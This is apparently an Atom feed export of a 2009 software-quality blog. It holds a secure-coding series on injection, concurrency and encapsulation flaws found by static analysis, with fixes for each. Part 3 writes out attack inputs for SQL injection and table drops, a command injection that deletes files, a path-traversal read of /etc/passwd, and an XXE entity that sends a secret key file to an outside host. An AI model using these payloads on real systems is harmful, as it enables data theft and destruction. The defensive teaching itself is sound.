<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:gd="http://schemas.google.com/g/2005" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;DE4ASHs5fCp7ImA9Wx5QEUs.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399</id><updated>2010-08-30T13:15:49.524+02:00</updated><title>The Kalistick Blog</title><subtitle type="html" /><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://blog.kalistick.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://blog.kalistick.com/" /><author><name>Kalistick</name><uri>http://www.blogger.com/profile/02839053763564835377</uri><email>noreply@blogger.com</email></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>12</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/kalistick_blog_en" /><feedburner:info uri="kalistick_blog_en" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;CUUEQnYzeip7ImA9WxNaEUk.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-2271627769141673872</id><published>2009-11-25T11:00:00.005+01:00</published><updated>2009-11-25T11:00:03.882+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-25T11:00:03.882+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Empirical overview of security vulnerabilities [3/4]</title><content type="html">&lt;p&gt;
The third post of &lt;a href="http://blog.kalistick.com/2009/11/empirical-overview-of-security.html"&gt;this series&lt;/a&gt; focused on security vulnerabilities addresses code injections issues.
&lt;/p&gt;

&lt;h2&gt;Code injection&lt;/h2&gt;
&lt;p&gt;
  Code injection is probably one of the most known security vulnerabilities for developers, however our analyses
  show it remains &lt;strong&gt;a major cause&lt;/strong&gt; of issues related to security.
&lt;/p&gt;

&lt;p&gt;
  Code injection aims to take control of a command or a query by using some parameter which is not simple raw data, but contains code which will be executed without any control. It is part of security holes which are easiest to implement, even for a non expert, and has implications which can be extremely serious, such as recovery or destruction of confidential data.
&lt;/p&gt;

&lt;p&gt;
  An example with a SQL query in C#:
&lt;/p&gt;
&lt;pre name="code" class="csharp:nocontrols"&gt;
  string query = "SELECT * FROM user "
    + "WHERE login='" + paramLogin 
    + "' AND password='" + paramPassword 
    + "'";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.ExecuteNonQuery();
  }
&lt;/pre&gt;


&lt;p&gt;
  If the parameter &lt;code&gt;paramPassword&lt;/code&gt; is a form field and the user enters &lt;em&gt;'OR 1=1&lt;/em&gt;, password condition will be simply ignored. And to destroy data, the user could try something like: &lt;em&gt;'; DROP TABLE user;&lt;/em&gt; ...
&lt;/p&gt;

&lt;p&gt;
  In terms of code analysis, we consider 2 levels of severity according to the origin of parameters:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;parameter comes from a &lt;strong&gt;method parameter or a class attribute&lt;/strong&gt;. It is not possible to assert that there is a security issue, because the parameter may have been checked before. But there is still a risk, because the query may be dangerous when reused elsewhere.
&lt;pre name="code" class="csharp:nocontrols"&gt;
public User authenticate(string paramLogin, string paramPassword)
{
  ...
  
  string query = "SELECT * FROM user "
    + "WHERE login='" + paramLogin 
    + "' AND password='" + paramPassword 
    + "'";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.ExecuteNonQuery();
  }
  
  ...
}
&lt;/pre&gt;
  &lt;/li&gt;
  &lt;li&gt;parameter comes &lt;strong&gt;directly from a HTTP parameter&lt;/strong&gt; (such as a form field). You are usually sure it is a real security hole:
&lt;pre name="code" class="csharp:nocontrols"&gt;
public User authenticate()
{
  ...
  
  string query = "SELECT * FROM user "
    + "WHERE login='" + Request["login"]
    + "' AND password='" + Request["password"] 
    + "'";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.ExecuteNonQuery();
  }
  
  ...
}
&lt;/pre&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;
This flaw is mainly known for SQL queries, but we often forget that it can apply to other areas. Usually, recommendations for protecting against injection code are:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;strong&gt;verify data entry&lt;/strong&gt; (e.g. a login should not contain quotes)
  &lt;li&gt; systematically &lt;strong&gt;escape special characters&lt;/strong&gt; such as quotes
  &lt;li&gt; or better, use &lt;strong&gt;parameterized queries&lt;/strong&gt; which will take care for this escaping automatically
&lt;/ul&gt;

&lt;h3&gt;SQL Injections and derivatives&lt;/h3&gt;
&lt;p&gt;
  Examples of SQL injections presented above also apply to SQL alternative technologies:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;HQL language for Java persistence framework &lt;a href="https://www.hibernate.org"&gt;Hibernate&lt;/a&gt;
  &lt;li&gt;JPQL language for Java persistence specification &lt;a href = "http://java.sun.com/javaee/technologies/persistence.jsp"&gt;JPA&lt;/a&gt;
  &lt;li&gt;generic query language &lt;a href="http://msdn.microsoft.com/en-us/library/bb308959.aspx"&gt;LINQ&lt;/a&gt; for C#
  &lt;li&gt; ...
&lt;/ul&gt;

&lt;p&gt;
  Actually, injection is possible when query is built &lt;strong&gt;concatenating&lt;/strong&gt; parameters directly. You can manually escape special characters such as quotes, but the best solution is generally to use &lt;strong&gt;parameterized queries&lt;/strong&gt;, which are available in most technologies. In addition to escaping special characters, these queries format parameters according to their data type, and may sometimes improve performance by caching structures of queries before setting parameters.
&lt;/p&gt;
&lt;pre name="code" class="csharp:nocontrols"&gt;
public User authenticate()
{
  ...
  
  string query = "SELECT * FROM user "
    + "WHERE login=@login AND password=@password";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.Parameters.AddWithValue("@login", Request["login"]);
    cmd.Parameters.AddWithValue("@password", Request["password"]);

    cmd.ExecuteNonQuery();
  }
  
  ...
}
&lt;/pre&gt;

&lt;p&gt;
  We also recommend the following two actions:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;never show SQL errors&lt;/strong&gt; directly to the user. Otherwise, the attacker could use them to find flaws inside queries
  &lt;li&gt;&lt;strong&gt;configure privileges&lt;/strong&gt; of account used for database connection, in order to limit harmful actions, for example by prohibiting actions altering the database schema
&lt;/ul&gt;

&lt;h3&gt;Command Injection&lt;/h3&gt;
&lt;p&gt;
  Another area in which we detect some code injections opportunities: &lt;strong&gt;executions of command lines&lt;/strong&gt;. Imagine a generic web service launching a tool through a command line and passing some parameter coming from the HTTP request:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
  @Override
  protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException
  {
    String param = req.getParameter("param");
    Process process = Runtime.getRuntime().exec("c:\\someTool.bat " + param);
    ...
  }
&lt;/pre&gt;

&lt;p&gt;
  By setting parameter with a value like &lt;em&gt;0 | del c:\\xxx&lt;/em&gt;, an attacker might cause some pretty damage on system! Although the Java API used here covers most cases trying to handle each term of the command as arguments of the first program, we see that it remains necessary to check the contents of the HTTP parameter.
&lt;/p&gt;

&lt;h3&gt;Injection of a file path&lt;/h3&gt;
&lt;p&gt;
  Another type of injection easy to set up and rather dangerous: inject a file path when the parameter is used to retrieve a file. For example, in this JSP, we support a copyright notice from language defined in HTTP parameter:
&lt;/p&gt;
&lt;pre name="code" class="html:nocontrols"&gt;
&amp;lt;html&gt;
  ...
  &amp;lt;jsp:include page="copyrights/&amp;lt;%= request.getParameter("lang") %&gt;"/&gt;
  ...
&amp;lt;/html&gt;
&lt;/pre&gt;

&lt;p&gt;
  If the attacker changes its parameter &lt;code&gt;lang&lt;/code&gt; for a value such as &lt;code&gt;../../../../etc/passwd&lt;/code&gt;,
  he simply retrieves the file from the HTTP response. To avoid this vulnerability, you have to use &lt;strong&gt;static includes&lt;/strong&gt; (&lt;code&gt;&lt;%@include file="copyrights/fr"%&gt;&lt;/code&gt;), &lt;strong&gt;lock access to external / confidential files&lt;/strong&gt;, and, again, check &lt;strong&gt;parameters&lt;/strong&gt; before you use them.
&lt;/p&gt;

&lt;h3&gt;XPath Injection&lt;/h3&gt;
&lt;p&gt;
  XPath is a query language in the same vein as SQL but applicable to XML documents. Previous SQL query might be written in XPath with something like: &lt;code&gt;//users/user[login/text()='...' and password/text()='...']&lt;/code&gt;. Problem is &lt;strong&gt;identical to SQL injection&lt;/strong&gt;, but XPath implementations do not always offer any equivalent parameterized queries. Example with the standard Java API (&gt; 5.0), which allow to handle this case properly:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public void authenticate(String login, String password) 
  throws ParserConfigurationException, XPathExpressionException, IOException, SAXException
{
  XPath xpath = XPathFactory.newInstance().newXPath();
  xpath.setXPathVariableResolver(new AuthResolver(login, password));
  XPathExpression query = xpath.compile("//users/user[login/text()=$login and password/text()=$password]/id/text()");
  Document d = DocumentBuilderFactory.newInstance().newDocumentBuilder
      ().parse(new File("auth.xml"));
  
  String userId = query.evaluate(d);
  ...
}

private final static class AuthResolver implements XPathVariableResolver
{
  private final String login;
  private final String password;

  public AuthResolver(String login, String password)
  {
    this.login = login;
    this.password = password;
  }

  public Object resolveVariable(QName qName)
  {
    if ("login".equals(qName.getLocalPart()))
      return login;
    if ("password".equals(qName.getLocalPart()))
      return password;
    
    return null;
  }
}
&lt;/pre&gt;

&lt;h3&gt;XML Injections&lt;/h3&gt;
&lt;p&gt;
  XML is often used as interchange format in SOA. Imagine a banking service recording account transactions from orders formatted as follows:
&lt;/p&gt;
&lt;pre name="code" class="xml:nocontrols"&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&gt;
&amp;lt;order&gt;
  &amp;lt;accountId&gt;123&amp;lt;/accountId&gt;
  &amp;lt;amount&gt;10000&amp;lt;/amount&gt;
  &amp;lt;type&gt;debit&amp;lt;/type&gt;
&amp;lt;/order&gt;
&lt;/pre&gt;

&lt;p&gt;
  Now, imagine that this order is generated from an input form in which the user enters an amount with value &lt;code&gt;0&amp;lt;/amount&amp;gt;&amp;lt;type&amp;gt;credit&amp;lt;/type&amp;gt;&amp;lt;amount&amp;gt;10000&lt;/code&gt;. XML order becomes:
&lt;/p&gt;
&lt;pre name="code" class="xml:nocontrols"&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&gt;
&amp;lt;order&gt;
  &amp;lt;accountId&gt;123&amp;lt;/accountId&gt;
  &amp;lt;amount&gt;0&amp;lt;/amount&gt;
  &amp;lt;type&gt;credit&amp;lt;/type&gt;
  &amp;lt;amount&gt;10000&amp;lt;/amount&gt;
  &amp;lt;type&gt;debit&amp;lt;/type&gt;
&amp;lt;/order&gt;
&lt;/pre&gt;

&lt;p&gt;
  Depending on how this XML document is read, order could be recorded as a credit instead of debit: this will be the case when using DOM search limited to the first element found.
&lt;/p&gt;

&lt;p&gt;
  This type of injection is easily prevented by &lt;strong&gt;validating&lt;/strong&gt; the XML document with a model (DTD or XSD Schema), in addition to common operations such as (data verification or escaping of special characters). This is the reason why we offer a rule requiring to validate an XML document before parsing.
&lt;/p&gt;

&lt;h3&gt;XXE (Xml eXternal Entity) Injections&lt;/h3&gt;
&lt;p&gt;
  Another type of injection specific to XML (source: &lt;a
  href = "http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00421.html"&gt;http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00421.html&lt;/a&gt;), but based on the concept of external entities, which is a mechanism for static inclusion in XML:
&lt;/p&gt;
&lt;pre name="code" class="xml:nocontrols"&gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY secreteKey SYSTEM "file:/somedir/secreteKey" &gt;
] &gt; 
&amp;lt;?xml version="1.0" encoding="UTF-8"?&gt;
&amp;lt;root&gt;
  &amp;lt;node&gt;&amp;amp;secreteKey;&amp;lt;/node&gt;
&amp;lt;/root&gt;
&lt;/pre&gt;

&lt;p&gt;
  When the file is interpreted by an XML parser, the text node &lt;code&gt;node&lt;/code&gt; is dynamically replaced with the contents of the file declared by the external entity.
&lt;/p&gt;

&lt;p&gt;
  If this file comes from another system, it offers the possibility to access unprotected data. To view these data, either ill-intentioned system is able to parse XML file (e.g. an RSS feed sent to a aggregation server), either it could even retrieve data automatically via a second external entity pointing to a server which it can access:
&lt;/p&gt;
&lt;pre name="code" class="xml:nocontrols"&gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY secreteKey SYSTEM "file:/somedir/secreteKey" &gt;
&amp;lt;!ENTITY sendSecreteKey SYSTEM "http:// someserver.com/?&amp;amp;secreteKey;" &gt;
] &gt; 
&amp;lt;?xml version="1.0" encoding="UTF-8"?&gt;
&amp;lt;root&gt;
  &amp;lt;node&gt;&amp;amp;sendSecreteKey;&amp;lt;/node&gt;
&amp;lt;/root&gt;
&lt;/pre&gt;

&lt;p&gt;
  The solution is simply to &lt;strong&gt;not accept external entities&lt;/strong&gt; in files coming from third parties, and of course, to protect your file system ...
&lt;/p&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;
  All types of injections are not listed here, but if there was only one thing to remember, this would be : systematically validate received data before using them!
&lt;/p&gt;

&lt;p&gt;
  &lt;strong&gt;To be continued...&lt;/strong&gt; Next post will conclude this series with a medley of other vulnerability issues regularly seen on Cockpit, and which are sometimes surprising.
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-2271627769141673872?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/2271627769141673872/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/11/empirical-overview-of-security_25.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2271627769141673872?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2271627769141673872?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/yqkmuCco17I/empirical-overview-of-security_25.html" title="Empirical overview of security vulnerabilities [3/4]" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/11/empirical-overview-of-security_25.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0YEQXc9eip7ImA9WxNbFUg.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-358773503723756773</id><published>2009-11-18T16:45:00.001+01:00</published><updated>2009-11-18T16:45:00.962+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-18T16:45:00.962+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Empirical overview of security vulnerabilities [2/4]</title><content type="html">&lt;p&gt;
  The second post of &lt;a href="http://blog.kalistick.com/2009/11/empirical-overview-of-security.html"&gt;this series&lt;/a&gt; focused on security vulnerabilities addresses two distinct issues: concurrent access and object encapsulation.
&lt;/p&gt;

&lt;h2&gt;Concurrent access&lt;/h2&gt;
&lt;p&gt;
  This is one of the most difficult areas to master in development. At the design stage, many of us having only one brain, or at the test stage, because simulating concurrent operations is often tricky to set up and even more to reproduce. Concurrent access have impact on several quality dimensions: reliability, performance, maintainability, but also security. Here are some examples.
&lt;/p&gt;

&lt;h3&gt;Sharing of attributes&lt;/h3&gt;
&lt;p&gt;
  One of the recurring problems in Java or C# development is the &lt;strong&gt;thread-safe&lt;/strong&gt; notion: is the objet usable simultaneously by several threads or not ? This information should be available in the API documentation. Misuse can lead to unpredictable results. Through &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Cockpit&lt;/a&gt;, we no longer count unsynchronized uses of formatting classes in Java from &lt;code&gt;java.text&lt;/code&gt; package, such as &lt;code&gt;java.text.SimpleDateFormat&lt;/code&gt;. Because few Java developers know that without synchronizing calls to these classes, they will sometimes get very strange results...
&lt;/p&gt;

&lt;p&gt;
  Another example with a direct impact on security is related to the use of some web frameworks. In order to improve performances, many of them use &lt;strong&gt;instance pools&lt;/strong&gt; for providing components handling HTTP requests. For example in Java: &lt;a href = "http://struts.apache.org/1.x/userGuide/building_controller.html"&gt;Struts (V1)&lt;/a&gt;, &lt;a href = "http://static.springsource.org/spring/docs/2.5.6/reference/mvc.html"&gt;Spring MVC&lt;/a&gt; or even &lt;a href = "http://tomcat.apache.org/tomcat-5.5-doc/servletapi/javax/servlet/http/HttpServlet.html"&gt;servlets&lt;/a&gt;. Same problem with C# frameworks such as &lt;a href = "http://blogs.msdn.com/benchr/archive/2008/09/03/does-asp-net-magically-handle-thread-safety-for-you.aspx"&gt;ASP.NET MVC&lt;/a&gt;.
&lt;/p&gt;

&lt;p&gt;
  The problem is that this pool mechanism is not always well exposed in the documentation, and the consequences may not be understood by developers. Worst case may lead to mix information from different users.
&lt;/p&gt;

&lt;p&gt;
  An example with a servlet (basic Java component handling a HTTP request):
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public class SomeServlet extends HttpServlet
{
  private Account account;

  @Override
  protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException
  {
    account = retrieveAccount(req);
    doSomething();
  }

  protected void doSomething()
  {
    String name = account.getName();
    ...
  }
}  
&lt;/pre&gt;

&lt;p&gt;
  This code stores information read from the HTTP request into an attribute of the servlet. Then it performs some operations through another method, operation which use the same attribute. The problem is that if a second request comes before the &lt;code&gt;doSomething()&lt;/code&gt;method is called, the attribute will be &lt;strong&gt;replaced&lt;/strong&gt; with information related to the second query. Because a servlet is provided by default through a &lt;strong&gt;single shared instance&lt;/strong&gt;.
&lt;/p&gt;

&lt;p&gt;
  I remember having worked on a project for a worldwide known client where users complained sometimes about losing their context and viewing information related to other users. This was exactly this servlet attribute issue! Consequences were limited here because it was an intranet with information which were not confidential, but you can easily imagine the situation in critical environments such as bank applications.
&lt;/p&gt;

&lt;p&gt;
  So check your API documentation and &lt;strong&gt;track down attributes in components which are not thread-safe&lt;/strong&gt;. In  web applications, data must be stored in the context of the request, session or application.
&lt;/p&gt;

&lt;h3&gt;Singletons&lt;/h3&gt;
&lt;p&gt;
  Although the use of singletons is being discarded in favour of &lt;a href = "http://en.wikipedia.org/wiki/Dependency_injection"&gt;dependency injection&lt;/a&gt;, it remains a common pattern considered as trivial to write. Yet our results show that more than one project on two contains singletons poorly written.
&lt;/p&gt;

&lt;p&gt;
  An example in C#, here the singleton is created at the first call (&lt;em&gt;lazy instantiation&lt;/em&gt;):
&lt;/p&gt;
&lt;pre name="code" class="csharp:nocontrols"&gt;
public sealed class BalanceHistory
{
  private static BalanceHistory INSTANCE;

  private BalanceHistory() { }

  public static BalanceHistory Instance
  {
    get
    {
      if (INSTANCE == null)
      {
        INSTANCE = new BalanceHistory();
      }
      
      return INSTANCE;
    }
  }
}     
&lt;/pre&gt;

&lt;p&gt;
  If the getter &lt;code&gt;getInstance()&lt;/code&gt; is called two times simultaneously, the singleton may be recreated twice: if both tests find the singleton as null, they will both create a new instance, and callers will work on distinct singletons (and the singleton created first will be lost)...
&lt;/p&gt;

&lt;p&gt;
  There are several ways to solve this problem:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;create the instance at declaration&lt;/strong&gt;: &lt;code&gt;private static BalanceHistory INSTANCE = new BalanceHistory();&lt;/code&gt;. This is usually the best solution, this instantiation will be really effective when class will be loaded, so in the case of a singleton, at the first call of &lt;code&gt;getInstance()&lt;/code&gt;!
  &lt;li&gt;&lt;strong&gt;synchronize&lt;/strong&gt; the creation of the instance: in C# through &lt;code&gt;[MethodImplAttribute (MethodImplOptions.Synchronized)]&lt;/code&gt;, or via some &lt;code&gt;lock&lt;/code&gt; on a dedicated lock object 
  &lt;li&gt;use a pattern based on inner classes, cf. &lt;a href = "http://en.wikipedia.org/wiki/Initialization_on_demand_holder_idiom"&gt;Initialization on demand holder idiom&lt;/a&gt; pattern 
  &lt;li&gt;use &lt;a href="http://en.wikipedia.org/wiki/Double-checked_locking"&gt;Double-checked locking&lt;/a&gt; pattern, even if it causes usually more problems than it solves (we considered this pattern as forbidden in the Cockpit)
&lt;/ul&gt;

&lt;h2&gt;Object Encapsulation&lt;/h2&gt;
&lt;p&gt;
  Protecting access to data is one of the basic principle of Object-Oriented Programming (OOP), but it does not mean that this kind of problems are solved by OOP.
&lt;/p&gt;
  
&lt;h3&gt;Data accessibility&lt;/h3&gt;
&lt;p&gt;
  OOP allows to protect data by using keywords defining their &lt;strong&gt;visibility&lt;/strong&gt; from the rest of the application, according to the location of classes: &lt;code&gt;private&lt;/code&gt;, &lt;code&gt;protected&lt;/code&gt;, &lt;code&gt;public&lt;/code&gt;, &lt;code&gt;internal&lt;/code&gt; (C#), &lt;code&gt;extern&lt;/code&gt; (C#), ... Other keywords allow to prevent overloading a class or method: &lt;code&gt;final&lt;/code&gt; (Java) or &lt;code&gt;sealed&lt;/code&gt; (C#). This configuration of accessibility is not trivial. It requires to find the &lt;strong&gt;right balance&lt;/strong&gt; between security and scalability, while keeping simple code.
&lt;/p&gt;

&lt;p&gt;
  Regarding the visibility of class attributes, the developer must add accessors to give them more visibility, keeping some way to check or modify data. Since this work is not very rewarding, that the code is burdened by methods (and properties in C#) which do nothing but set or return attributes, and that developers are lazy by nature, these attributes are sometimes defined as non-private.
&lt;/p&gt;

&lt;p&gt;
  And regarding overloading of classes or methods, most of developers do not take care of finalizing/sealing their code, without considering the &lt;strong&gt;risks&lt;/strong&gt;.
&lt;/p&gt;

&lt;p&gt;
  These risks may be classified into two types:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;some &lt;strong&gt;ill-intentioned&lt;/strong&gt; uses from third-party code. This objection is often theoretical, because     class loaders do not easily allow such exploitation. However, some designs based on plugins or dependency injection makes these vulnerabilities easier to exploit
  &lt;li&gt;implementations originally well-intentioned may introduce flaws by &lt;strong&gt;overloading critical functions&lt;/strong&gt; which should be protected, for example a method retrieving user rights.
&lt;/ul&gt;

&lt;p&gt;
  Developers must therefore always take care of visibility about data or critical processings.
&lt;/p&gt;
  
&lt;h3&gt;Exposure of mutable data&lt;/h3&gt;
&lt;p&gt;
  Another area difficult to manage in OOP and which has a direct impact on security is the exposure of &lt;strong&gt;mutable attributes&lt;/strong&gt;. A mutable object is an object whose state can be changed after initialization, e.g. an array or a &lt;code&gt;StringBuilder&lt;/code&gt; but also most of the &lt;a href = "http://en.wikipedia.org/wiki/Plain_Old_Java_Object"&gt; POJO&lt;/a&gt; / &lt;a href = "http://en.wikipedia.org/wiki/Plain_Old_CLR_Object"&gt;POCO&lt;/a&gt; created in an application.
&lt;/p&gt;

&lt;p&gt;
  The problem is that a &lt;em&gt;getter&lt;/em&gt; on a mutable attribute does not only give some simple access permission, it allows the caller to &lt;strong&gt;change the state of this attribute&lt;/strong&gt;. A list of user rights could therefore be  easily changed:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public class User
{
  private Set&amp;lt;UserRole&gt; roles = new HashSet&amp;lt;UserRole&gt;();

  ...
  
  public Set&amp;lt;UserRole&gt; getRoles()
  {
    return roles;
  }
}

public class MaliciousCode
{
  public void someMethod()
  {
    User user = userRegistry.findUser("myUserId");
    user.getRoles().add(UserRole.Admin);
  }
}
&lt;/pre&gt;

&lt;p&gt;
  To guard against such problems, several defensive options are available:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;return a &lt;strong&gt;copy&lt;/strong&gt; of the attribute:
&lt;pre name="code" class="java:nocontrols"&gt;
public class User
{
  public Set&amp;lt;UserRole&gt; getRoles()
  {
    return new HashSet&amp;lt;UserRole&gt;(roles);
  }
}
&lt;/pre&gt;
    &lt;p&gt;
      In some cases, the copy must be deeply cloned, e.g. if the attribute is a list of mutable objects, each mutable object of the cloned list must also be cloned. The problem is that the callers will not have the original instance: if attribute is updated somewhere, cloned instances will no be synchronised.
   &lt;/p&gt;
 &lt;/li&gt;

  &lt;li&gt;return a &lt;strong&gt;proxy&lt;/strong&gt; wrapping mutable object and blocking update methods. For example:
&lt;pre name="code" class="java:nocontrols"&gt;
public class User
{
  public Set&amp;lt;UserRole&gt; getRoles()
  {
    return new HashSet&amp;lt;UserRole&gt;(roles)
    {
      @Override
      public boolean add(UserRole o)
      {
        throw new UnsupportedOperationException();
      }

      @Override
      public boolean remove(Object o)
      {
        throw new UnsupportedOperationException();
      }
      
      ...
    };
  }
}
&lt;/pre&gt;
    &lt;p&gt;
      All update methods must be overridden. Compared to the previous option, avantage is that you can finely control access to each method, and most important, you keep original instance through proxy encapsulation
   &lt;/p&gt;

    &lt;p&gt;
      Java also provides an API to lock easily collections in read-only using this mechanism, thanks to the class &lt;code&gt;java.util.Collections&lt;/code&gt;. Just write for example:
   &lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public class User
{
  public Set&amp;lt;UserRole&gt; getRoles()
  {
    return Collections.unmodifiableSet(roles);
  }
}
&lt;/pre&gt;
 &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;
  Whatever the cases, these mechanisms must be reserved for specific cases where exposed data are critical, in order to avoid reduction of performance because of unnecessary instantiations.
&lt;/p&gt;

&lt;p&gt;
  &lt;strong&gt;To be continued...&lt;/strong&gt; In the next post, we will discuss issues related to code injection.
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-358773503723756773?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/358773503723756773/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/11/empirical-overview-of-security_18.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/358773503723756773?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/358773503723756773?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/FJdcIj6WwXY/empirical-overview-of-security_18.html" title="Empirical overview of security vulnerabilities [2/4]" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/11/empirical-overview-of-security_18.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkUCSX87fip7ImA9WxNUGEs.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-5096630830478619386</id><published>2009-11-10T14:53:00.005+01:00</published><updated>2009-11-10T16:51:08.106+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-10T16:51:08.106+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Empirical overview of security vulnerabilities [1/4]</title><content type="html">&lt;p&gt;
   The objective of this four-part article is to provide an overview of security issues identified through the &lt;a href="http://www.kalistick.com/index.php/english/Cockpit"&gt;Cockpit&lt;/a&gt;. Unlike other surveys which are based on theoretical approaches more or less exhaustive, approach is here &lt;strong&gt;empirical&lt;/strong&gt;: problems mentioned are those we detect through our automated analyses on our customer projects (static analysis on Java or C# code). These problems are those that seem most interesting to inject as a new booster shot for developers who would still not be sensitive to this security dimension.
&lt;/p&gt;

&lt;h2&gt;Preamble&lt;/h2&gt;
&lt;p&gt;
   Results are not reassuring, many security rules, even basic, are often ignored in development. Even less reassuring when you know that these applications are sometimes part of the critical sectors: banking, insurance, health ... This may be probably explained by several factors:
&lt;/p&gt;
&lt;ul&gt;
   &lt;li&gt;developers show often &lt;strong&gt;motivations&lt;/strong&gt; related to innovation, technical challenges, addition of new features, whereas security prefers paranoid-like behavior, requires mature technologies / architectures, and becomes fragile as soon as you introduce new elements
   &lt;strong&gt;&lt;li&gt;an obvious lack of training&lt;/strong&gt;. We all presume that security is a prerequisite known by all developers, but only few training schools or companies really educate (future) developers about security concerns
   &lt;li&gt;&lt;strong&gt;security-oriented tests&lt;/strong&gt; are rarely performed during acceptance phases, which are often limited to check functional and architectural behaviors. And when &lt;a href="http://en.wikipedia.org/wiki/Black-box_testing"&gt; black box&lt;/a&gt; tests are implemented (e.g. with software testing exploration using HTTP access), they do not detect all issues detected by &lt;a href="http://en.wikipedia.org/wiki/White_box_testing"&gt;white box&lt;/a&gt; tests. And they sometimes arrive too late to allow a fixing campaign on code.
&lt;/ul&gt;

&lt;h2&gt;Any quality problem inside code is a potential security issue!&lt;/h2&gt;
&lt;p&gt;
